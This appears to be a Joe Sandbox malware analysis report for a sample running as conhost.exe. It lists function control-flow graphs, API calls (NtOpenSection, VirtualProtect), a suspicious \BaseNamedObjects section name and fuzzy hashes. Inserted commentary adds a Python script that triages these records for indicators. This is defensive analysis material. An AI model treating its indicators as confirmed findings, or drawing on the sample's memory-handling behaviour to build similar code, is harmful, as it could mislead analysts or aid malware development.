101 Function_00000001400027D0 37->101 106 Function_00000001400014D6 37->106 38 Function_0000000140006640 38->32 39->71 40 Function_0000000140003141 41 Function_0000000140006341 42 Function_0000000140006441 43 Function_0000000140001F47 61 Function_0000000140001870 43->61 44 Function_0000000140002050 46 Function_0000000140001650 47 Function_0000000140002751 48 Function_0000000140006551 49 Function_000000014000155D 49->76 50->76 51 Function_0000000140001760 107 Function_00000001400020E0 51->107 52->37 52->52 52->61 68 Function_0000000140001880 52->68 70 Function_0000000140001F90 52->70 52->96 54 Function_0000000140002460 55 Function_0000000140003160 56 Function_0000000140006361 57 Function_0000000140001E65 57->61 58->76 59->76 60 Function_000000014000216F 63 Function_0000000140001A70 63->39 63->81 64 Function_0000000140002770 65 Function_0000000140006471 66 Function_0000000140006571 67->76 68->27 68->39 68->53 68->81 69 Function_0000000140003180 72 Function_0000000140002590 73 Function_0000000140002790 74 Function_0000000140002691 75 Function_0000000140006391 76->8 76->38 77 Function_0000000140002194 77->61 78->76 79 Function_000000014000219E 80 Function_0000000140001FA0 81->39 87 Function_00000001400023B0 81->87 100 Function_00000001400024D0 81->100 82 Function_00000001400027A0 83 Function_00000001400031A1 84 Function_00000001400064A1 85->76 86->76 89 Function_00000001400022B0 90 Function_00000001400026B0 91 Function_00000001400027B1 92 Function_00000001400063B1 93 Function_00000001400065B1 94 Function_0000000140001AB3 94->39 94->81 97 Function_0000000140001AC3 97->39 97->81 98 Function_00000001400014C7 98->76 99 Function_0000000140001FD0 101->5 101->10 101->17 101->23 101->32 101->49 101->50 101->53 101->62 101->86 101->98 102 Function_00000001400017D0 103 Function_00000001400026D0 104 Function_00000001400063D1 105 Function_0000000140001AD4 105->39 105->81 106->76 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • NtOpenSection.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: OpenSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 1950954290-0
                                                                                                    • Opcode ID: a923caea3aedb3c196ce5840bc68ebf5f285de31d4ada5355376284b378bb800
                                                                                                    • Instruction ID: f52bb56a26aec6286b1ea6478ff1b17f0c1a3bfdae4c07577ac701bf94f018f1
                                                                                                    • Opcode Fuzzy Hash: a923caea3aedb3c196ce5840bc68ebf5f285de31d4ada5355376284b378bb800
                                                                                                    • Instruction Fuzzy Hash: B1F09DB2608B808AEA12DB62F85179A77A1F38C7C0F009929BBC853735DB38C190CB40

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 394 140002a43-140002a6b call 1400014c7 389->394 395 140002954-140002963 389->395 391->389 393 140002870-140002877 391->393 396 140002879-140002882 393->396 397 140002840-140002842 393->397 412 140002a76-140002ab8 call 140001503 call 140006630 memset 394->412 413 140002a6d 394->413 398 140002fa7-140002fe4 call 140001370 395->398 399 140002969-140002978 395->399 402 140002884-14000289b 396->402 403 1400028e8-1400028eb 396->403 400 14000284a-14000285e 397->400 404 1400029d4-140002a3e wcsncmp call 1400014e5 399->404 405 14000297a-1400029cd 399->405 400->389 400->391 408 1400028e5 402->408 409 14000289d-1400028b2 402->409 403->400 404->394 405->404 408->403 414 1400028c0-1400028c7 409->414 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415 1400028c9-1400028e3 414->415 416 1400028f0-1400028f9 414->416 415->408 415->414 416->400 424 140002ac7-140002afc 421->424 429 140002f7a 421->429 423 140002b03-140002b33 wcscpy wcscat wcslen 422->423 422->424 427 140002b35-140002b66 wcslen 423->427 428 140002b68-140002b95 423->428 424->423 430 140002b98-140002baf wcslen 427->430 428->430 429->423 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 434 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->434 435 140002bca-140002bde 431->435 432->398 453 140002eed-140002f0b call 140001512 434->453 454 140002f10-140002f38 call 14000145e 434->454 435->434 453->454
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                                                    • String ID: 0$X$\BaseNamedObjects\qdpnprrzvlcxaaqg$`
                                                                                                    • API String ID: 780471329-975928381
                                                                                                    • Opcode ID: e0318adb0dbd4564b9f192ff8ace1adad8a0fb704a24824db8b439d87ab7a846
                                                                                                    • Instruction ID: 0ca124f9ffee38d92fc9e5ab9fb194d169faf43235d32241d109a9a9ba303ed6
                                                                                                    • Opcode Fuzzy Hash: e0318adb0dbd4564b9f192ff8ace1adad8a0fb704a24824db8b439d87ab7a846
                                                                                                    • Instruction Fuzzy Hash: 35125AB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643109117-0
                                                                                                    • Opcode ID: 3e47b941a18d40a05cf5dbb4c3716eebdba2920780b0a3dae55f15ebab0588eb
                                                                                                    • Instruction ID: 59287579fd2cbbe1d8a3e4f08483d7eb513d4c53ed15668fa93f54147bc8dcd6
                                                                                                    • Opcode Fuzzy Hash: 3e47b941a18d40a05cf5dbb4c3716eebdba2920780b0a3dae55f15ebab0588eb
                                                                                                    • Instruction Fuzzy Hash: D75112F1611A4085FB16EF67F9947EA27A1BB8CBD0F449121FB4E873B2DE3884958700

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 509 140001cf4-140001cfe call 140001d40 503->509 510 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->510 504->505 508 140001c04 504->508 505->502 505->503 511 140001cd7-140001cf3 memcpy 508->511 514 140001d03-140001d1e call 140001d40 509->514 510->514 517 140001c72-140001c79 510->517 518 140001d23-140001d38 GetLastError call 140001d40 514->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->511 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                    • API String ID: 2595394609-2123141913
                                                                                                    • Opcode ID: 33d5b868e8eebb6b2cff367d03fabe1666b92cc2c7a1d8284b12e8b2d2f01650
                                                                                                    • Instruction ID: 8fe685864c950126c70aef331d4ef6a473e45b0d851c9b376e186f7e6f8e001c
                                                                                                    • Opcode Fuzzy Hash: 33d5b868e8eebb6b2cff367d03fabe1666b92cc2c7a1d8284b12e8b2d2f01650
                                                                                                    • Instruction Fuzzy Hash: F54132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
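
                                                                                                    The three records above (the NtOpenSection call at 00000001400013F7, the function at 1400027d0 that assembles the \BaseNamedObjects\qdpnprrzvlcxaaqg name with wcscpy/wcscat, and the VirtualQuery/VirtualProtect/memcpy routine at 140001ba0) are the lines an analyst would otherwise read by hand. The Python below is an added example; it is not output of Joe Sandbox and not code from the sample. It parses function records in the text layout shown on this page and sorts them into three buckets: compiler runtime, named-object indicator, and section-API use. The three error strings of the 140001ba0 record are the messages from mingw-w64's crt pseudo-reloc.c, so that function is the compiler's pseudo-relocation fix-up code rather than the sample's own logic; a section under \BaseNamedObjects opened with NtOpenSection is shared memory reachable from any process in the session, so the random-looking name is the value worth pivoting on. The "$"-separated reading of the String ID field, the record boundaries at each "Control-flow Graph" heading, the extra ntdll section APIs in SECTION_APIS, and SAMPLE_REPORT (constructed from the records on this page) are assumptions of this example.

```python
"""Triage of Joe Sandbox per-function records (added example, not report output).

Parsing assumptions: a record starts at a 'Control-flow Graph' heading, API
calls appear as '• Name.MODULE(...), ref: addr', and the '$'-separated values
of 'String ID' are the function's referenced strings. SAMPLE_REPORT below is
constructed from the records shown on this page.
"""
import re
from dataclasses import dataclass, field

# Messages from mingw-w64's crt/misc/pseudo-reloc.c (__write_memory). A function
# carrying them is compiler runtime (pseudo-relocation fix-ups), not sample logic.
MINGW_PSEUDO_RELOC_MARKERS = (
    "VirtualProtect failed with code 0x%x",
    "VirtualQuery failed for %d bytes at address %p",
    "Address %p has no image-section",
)
# ntdll section APIs worth flagging (assumption: only NtOpenSection is on this page).
SECTION_APIS = {"NtOpenSection", "NtCreateSection", "NtMapViewOfSection"}

API_LINE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\(.*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$")
CFG_LINE = re.compile(r"^\s*control_flow_graph\s+\d+\s+(?P<start>[0-9a-f]+)-")
NAMED_OBJECT = re.compile(r"\\BaseNamedObjects\\[A-Za-z0-9_.-]+")

@dataclass
class FunctionRecord:
    start: str = "?"                          # first block address when the CFG line is present
    apis: list = field(default_factory=list)  # (api, module, call-site ref)
    strings: list = field(default_factory=list)
    fuzzy_hash: str = ""

def parse_records(text):
    """Split report text into FunctionRecord objects, one per 'Control-flow Graph' heading."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Control-flow Graph":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if m := CFG_LINE.match(line):
            cur.start = m.group("start")
        elif m := API_LINE.match(line):
            cur.apis.append((m.group("api"), m.group("mod"), m.group("ref")))
        elif m := FIELD_LINE.match(line):
            key, val = m.group("key"), m.group("val").strip()
            if key == "String ID" and val:
                cur.strings.extend(s.strip() for s in val.split("$") if s.strip())
            elif key == "Instruction Fuzzy Hash":
                cur.fuzzy_hash = val
    return records

def triage(rec):
    """Return (verdict, evidence). Runtime code is recognised first so a CRT helper is not
    mistaken for sample logic; a named object outranks a bare section-API hit because the
    name is what an analyst pivots on across processes and samples."""
    crt = [s for s in rec.strings if any(m in s for m in MINGW_PSEUDO_RELOC_MARKERS)]
    if crt:
        return "crt-runtime", crt
    names = [n for s in rec.strings for n in NAMED_OBJECT.findall(s)]
    if names:
        return "named-object", names
    hits = [f"{api}.{mod}@{ref}" for api, mod, ref in rec.apis if api in SECTION_APIS]
    if hits:
        return "section-open", hits
    return "unclassified", []

def named_object_iocs(records):
    """Every BaseNamedObjects name referenced anywhere in the parsed records."""
    return {n for r in records for s in r.strings for n in NAMED_OBJECT.findall(s)}

# Constructed from the three records on this page (not the full report).
SAMPLE_REPORT = r"""
Control-flow Graph
APIs
• NtOpenSection.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
• API ID: OpenSection
• String ID:
Control-flow Graph
control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388
• API ID: wcslen$memset$wcscatwcscpywcsncmp
• String ID: 0$X$\BaseNamedObjects\qdpnprrzvlcxaaqg$`
• Instruction Fuzzy Hash: 35125AB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
Control-flow Graph
control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500
• VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
• VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
• memcpy.MSVCRT ref: 0000000140001CE0
• GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for r in recs:
        print(r.start, *triage(r))
    print("named-object IOCs:", sorted(named_object_iocs(recs)))
```

                                                                                                    Run against a full report export, the crt-runtime bucket removes the MinGW start-up and relocation helpers (the functions in this dump that only call 140001394, or only touch critical sections and TLS, fall into the same category once their strings are known), and the named-object bucket yields the one string from this module that is specific enough to hunt for elsewhere.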

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3326252324-0
                                                                                                    • Opcode ID: d08e14779ef784e5b274f9410f1df34d10b7f9b45ed8462817a217195fc6686c
                                                                                                    • Instruction ID: e40e1da60a1a5d331dd26ba47eda995497d599188102bfe9744f788749b46c7b
                                                                                                    • Opcode Fuzzy Hash: d08e14779ef784e5b274f9410f1df34d10b7f9b45ed8462817a217195fc6686c
                                                                                                    • Instruction Fuzzy Hash: B821F5B0305A0192FA6BEB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006bf0 553->557 560 140001f43-140001f45 554->560 561 140001f2f-140001f3f 554->561 555->554 558 140001ee4-140001ee8 555->558 556->548 562 140001ec0 556->562 557->554 566 140001f0c-140001f10 557->566 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->554 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CCG
                                                                                                    • API String ID: 0-1584390748
                                                                                                    • Opcode ID: 35b4906de10c631e66e3b23b94ad5b459cb4b8ee30e741b9a85039f9bcae7566
                                                                                                    • Instruction ID: 7d6232b93d6e17ed90188a579955942f9e6f6d73f73cd7587163c1a56a44d235
                                                                                                    • Opcode Fuzzy Hash: 35b4906de10c631e66e3b23b94ad5b459cb4b8ee30e741b9a85039f9bcae7566
                                                                                                    • Instruction Fuzzy Hash: 592139B1A0150542FA77DA2BB9A03F92192ABCC7E4F258535BF19873F5DF3888C28241

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 580 14000194d-140001954 578->580 581 14000191e-140001929 578->581 579->580 582 140001943-140001947 579->582 585 140001956-140001961 580->585 586 14000199e-1400019a6 580->586 581->580 583 14000192b-14000193a 581->583 582->580 584 140001a20-140001a26 582->584 583->579 587 140001b87-140001b98 call 140001d40 584->587 588 140001a2c-140001a37 584->588 589 140001970-14000199c call 140001ba0 585->589 586->572 590 1400019a8-1400019c1 586->590 588->586 591 140001a3d-140001a5f 588->591 589->586 594 1400019df-1400019e7 590->594 597 140001a7d-140001a97 591->597 595 1400019e9-140001a0d VirtualProtect 594->595 596 1400019d0-1400019dd 594->596 595->596 596->572 596->594 600 140001b74-140001b82 call 140001d40 597->600 601 140001a9d-140001afa 597->601 600->587 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->597 613->609 614->600
                                                                                                    APIs
                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                    • API String ID: 544645111-395989641
                                                                                                    • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                    • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                                                                    • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                    • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-3474627141
                                                                                                    • Opcode ID: 6e962bcb0f052a0dea548b3bc938a4dc15a218e64a80b598041495bfab8aa735
                                                                                                    • Instruction ID: 88266abc16e5ce81ea68448ecf712b8cc9874a99fed6f92d18931fad02326cff
                                                                                                    • Opcode Fuzzy Hash: 6e962bcb0f052a0dea548b3bc938a4dc15a218e64a80b598041495bfab8aa735
                                                                                                    • Instruction Fuzzy Hash: 79F09671A14A4482E612EF6AB9417EDA361E75D7C1F50D211FF4DA76A1DF3CD182C310

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000040.00000002.2596139121.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    • Associated: 00000040.00000002.2596088889.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596200164.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596242172.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                                                    • Associated: 00000040.00000002.2596323916.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_64_2_140000000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 682475483-0
                                                                                                    • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                    • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                                                                    • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                    • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0.6%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:75
                                                                                                    execution_graph 19836 7ff75aeac590 19847 7ff75aeb0348 EnterCriticalSection 19836->19847 20510 7ff75aea5480 20511 7ff75aea548b 20510->20511 20519 7ff75aeaf314 20511->20519 20532 7ff75aeb0348 EnterCriticalSection 20519->20532 19492 7ff75aeaf9fc 19493 7ff75aeafbee 19492->19493 19496 7ff75aeafa3e _isindst 19492->19496 19494 7ff75aea4f78 _set_fmode 11 API calls 19493->19494 19495 7ff75aeafbde 19494->19495 19497 7ff75ae9c5c0 _log10_special 8 API calls 19495->19497 19496->19493 19499 7ff75aeafabe _isindst 19496->19499 19498 7ff75aeafc09 19497->19498 19513 7ff75aeb6204 19499->19513 19504 7ff75aeafc1a 19506 7ff75aeaa970 _isindst 17 API calls 19504->19506 19508 7ff75aeafc2e 19506->19508 19511 7ff75aeafb1b 19511->19495 19537 7ff75aeb6248 19511->19537 19514 7ff75aeb6213 19513->19514 19518 7ff75aeafadc 19513->19518 19544 7ff75aeb0348 EnterCriticalSection 19514->19544 19519 7ff75aeb5608 19518->19519 19520 7ff75aeb5611 19519->19520 19521 7ff75aeafaf1 19519->19521 19522 7ff75aea4f78 _set_fmode 11 API calls 19520->19522 19521->19504 19525 7ff75aeb5638 19521->19525 19523 7ff75aeb5616 19522->19523 19524 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19523->19524 19524->19521 19526 7ff75aeb5641 19525->19526 19527 7ff75aeafb02 19525->19527 19528 7ff75aea4f78 _set_fmode 11 API calls 19526->19528 19527->19504 19531 7ff75aeb5668 19527->19531 19529 7ff75aeb5646 19528->19529 19530 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19529->19530 19530->19527 19532 7ff75aeb5671 19531->19532 19536 7ff75aeafb13 19531->19536 19533 7ff75aea4f78 _set_fmode 11 API calls 19532->19533 19534 7ff75aeb5676 19533->19534 19535 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 19534->19535 19535->19536 19536->19504 19536->19511 19545 7ff75aeb0348 EnterCriticalSection 19537->19545 20546 7ff75aebae6e 20547 7ff75aebae87 20546->20547 20548 7ff75aebae7d 20546->20548 20550 7ff75aeb03a8 